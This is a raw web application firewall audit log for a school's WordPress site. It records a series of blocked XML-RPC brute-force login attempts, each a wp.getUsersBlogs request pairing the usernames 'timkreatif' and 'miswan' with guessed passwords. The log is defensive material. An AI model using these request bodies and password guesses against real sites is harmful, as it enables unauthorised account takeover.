timkreatif
smkn22-jkt.sch888
--a7a28d36-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a7a28d36-E--
--a7a28d36-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (137+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516128262088 5692 (- - -)
Stopwatch2: 1745516128262088 5692; combined=4297, p1=533, p2=3570, p3=0, p4=0, p5=115, sr=90, sw=79, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a7a28d36-Z--
--7ddaa926-A--
[25/Apr/2025:00:36:28 +0700] aAp2nN5yz20UX9VrdZPggQAAAEg 103.236.140.4 32968 103.236.140.4 8181
--7ddaa926-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7ddaa926-C--
wp.getUsersBlogs
timkreatif
123@qwe
--7ddaa926-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7ddaa926-E--
--7ddaa926-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516188004783 4917 (- - -)
Stopwatch2: 1745516188004783 4917; combined=3863, p1=451, p2=3227, p3=0, p4=0, p5=107, sr=84, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7ddaa926-Z--
--df956a16-A--
[25/Apr/2025:00:37:28 +0700] aAp22MlQo524fhbIj1yl3AAAABY 103.236.140.4 37744 103.236.140.4 8181
--df956a16-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--df956a16-C--
wp.getUsersBlogs
timkreatif
xxxx
--df956a16-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--df956a16-E--
--df956a16-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (145+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516248023814 4592 (- - -)
Stopwatch2: 1745516248023814 4592; combined=3377, p1=398, p2=2822, p3=0, p4=0, p5=93, sr=80, sw=64, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--df956a16-Z--
--c160e425-A--
[25/Apr/2025:00:37:51 +0700] aAp278lQo524fhbIj1ymmwAAABI 103.236.140.4 39900 103.236.140.4 8181
--c160e425-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c160e425-C--
wp.getUsersBlogs
timkreatif
1234%^&*
--c160e425-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c160e425-E--
--c160e425-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516271186695 4271 (- - -)
Stopwatch2: 1745516271186695 4271; combined=2949, p1=362, p2=2442, p3=0, p4=0, p5=89, sr=69, sw=56, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c160e425-Z--
--26e6ba71-A--
[25/Apr/2025:00:38:28 +0700] aAp3FN5yz20UX9VrdZPjPgAAAFA 103.236.140.4 43490 103.236.140.4 8181
--26e6ba71-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--26e6ba71-C--
wp.getUsersBlogs
timkreatif
livetest
--26e6ba71-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--26e6ba71-E--
--26e6ba71-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516308299768 4111 (- - -)
Stopwatch2: 1745516308299768 4111; combined=2774, p1=362, p2=2276, p3=0, p4=0, p5=80, sr=75, sw=56, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--26e6ba71-Z--
--982a1b4f-A--
[25/Apr/2025:00:39:28 +0700] aAp3UGLuk3f9kLjsdTagsQAAAIo 103.236.140.4 48600 103.236.140.4 8181
--982a1b4f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--982a1b4f-C--
wp.getUsersBlogs
timkreatif
evite
--982a1b4f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--982a1b4f-E--
--982a1b4f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (132+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516368112362 4928 (- - -)
Stopwatch2: 1745516368112362 4928; combined=3408, p1=438, p2=2807, p3=0, p4=0, p5=97, sr=93, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--982a1b4f-Z--
--31882720-A--
[25/Apr/2025:00:40:28 +0700] aAp3jMlQo524fhbIj1yq2wAAABg 103.236.140.4 53924 103.236.140.4 8181
--31882720-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--31882720-C--
wp.getUsersBlogs
timkreatif
789456
--31882720-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--31882720-E--
--31882720-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (133+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516428339754 4537 (- - -)
Stopwatch2: 1745516428339754 4537; combined=3497, p1=382, p2=2964, p3=0, p4=0, p5=90, sr=80, sw=61, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--31882720-Z--
--193ff947-A--
[25/Apr/2025:00:41:28 +0700] aAp3yPiVYlyO1xhz7yPV0QAAAMk 103.236.140.4 58694 103.236.140.4 8181
--193ff947-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--193ff947-C--
wp.getUsersBlogs
miswan
miswan@2019
--193ff947-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--193ff947-E--
--193ff947-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (125+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516488702719 5452 (- - -)
Stopwatch2: 1745516488702719 5452; combined=3984, p1=447, p2=3332, p3=0, p4=0, p5=119, sr=97, sw=86, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--193ff947-Z--
--ec51c42c-A--
[25/Apr/2025:00:42:28 +0700] aAp4BGLuk3f9kLjsdTaj5QAAAIg 103.236.140.4 35198 103.236.140.4 8181
--ec51c42c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ec51c42c-C--
wp.getUsersBlogs
miswan
trustno1
--ec51c42c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ec51c42c-E--
--ec51c42c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (130+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516548192011 6247 (- - -)
Stopwatch2: 1745516548192011 6247; combined=4423, p1=562, p2=3690, p3=0, p4=0, p5=102, sr=104, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ec51c42c-Z--
--f3ac124f-A--
[25/Apr/2025:00:43:28 +0700] aAp4QPiVYlyO1xhz7yPYkwAAANI 103.236.140.4 40118 103.236.140.4 8181
--f3ac124f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f3ac124f-C--
wp.getUsersBlogs
miswan
access
--f3ac124f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f3ac124f-E--
--f3ac124f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (124+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516608038618 5196 (- - -)
Stopwatch2: 1745516608038618 5196; combined=3700, p1=452, p2=3056, p3=0, p4=0, p5=111, sr=91, sw=81, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f3ac124f-Z--
--89604a5f-A--
[25/Apr/2025:00:44:28 +0700] aAp4fMlQo524fhbIj1ywhAAAABY 103.236.140.4 44538 103.236.140.4 8181
--89604a5f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--89604a5f-C--
wp.getUsersBlogs
miswan
password12
--89604a5f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--89604a5f-E--
--89604a5f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516668192982 5312 (- - -)
Stopwatch2: 1745516668192982 5312; combined=3646, p1=475, p2=3012, p3=0, p4=0, p5=93, sr=92, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--89604a5f-Z--
--9bca3c45-A--
[25/Apr/2025:00:45:28 +0700] aAp4uGLuk3f9kLjsdTanPgAAAIY 103.236.140.4 48278 103.236.140.4 8181
--9bca3c45-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9bca3c45-C--
wp.getUsersBlogs
miswan
administrators
--9bca3c45-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9bca3c45-E--
--9bca3c45-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516728104922 4348 (- - -)
Stopwatch2: 1745516728104922 4348; combined=3090, p1=410, p2=2532, p3=0, p4=0, p5=90, sr=75, sw=58, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9bca3c45-Z--
--f906fb6b-A--
[25/Apr/2025:00:45:42 +0700] aAp4xt5yz20UX9VrdZPrHAAAAE4 103.236.140.4 48900 103.236.140.4 8181
--f906fb6b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f906fb6b-C--
wp.getUsersBlogs
miswan
1234%^&*
--f906fb6b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f906fb6b-E--
--f906fb6b-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516742357681 6215 (- - -)
Stopwatch2: 1745516742357681 6215; combined=4366, p1=545, p2=3632, p3=0, p4=0, p5=114, sr=91, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f906fb6b-Z--
--0ae11e38-A--
[25/Apr/2025:00:46:28 +0700] aAp49GLuk3f9kLjsdTaoUQAAAIA 103.236.140.4 51746 103.236.140.4 8181
--0ae11e38-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--0ae11e38-C--
wp.getUsersBlogs
miswan
sophie
--0ae11e38-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0ae11e38-E--
--0ae11e38-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (137+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516788166100 4960 (- - -)
Stopwatch2: 1745516788166100 4960; combined=3715, p1=452, p2=3085, p3=0, p4=0, p5=104, sr=86, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0ae11e38-Z--
--3ddb4a20-A--
[25/Apr/2025:00:47:28 +0700] aAp5MGLuk3f9kLjsdTapKwAAAIY 103.236.140.4 54768 103.236.140.4 8181
--3ddb4a20-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--3ddb4a20-C--
wp.getUsersBlogs
miswan
mother
--3ddb4a20-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3ddb4a20-E--
--3ddb4a20-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516848319225 4777 (- - -)
Stopwatch2: 1745516848319225 4777; combined=3709, p1=428, p2=3107, p3=0, p4=0, p5=102, sr=89, sw=72, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3ddb4a20-Z--
--d6e1ad49-A--
[25/Apr/2025:00:48:28 +0700] aAp5bN5yz20UX9VrdZPtsQAAAFA 103.236.140.4 58954 103.236.140.4 8181
--d6e1ad49-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d6e1ad49-C--
wp.getUsersBlogs
miswan
1g2w3e4r
--d6e1ad49-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d6e1ad49-E--
--d6e1ad49-H--
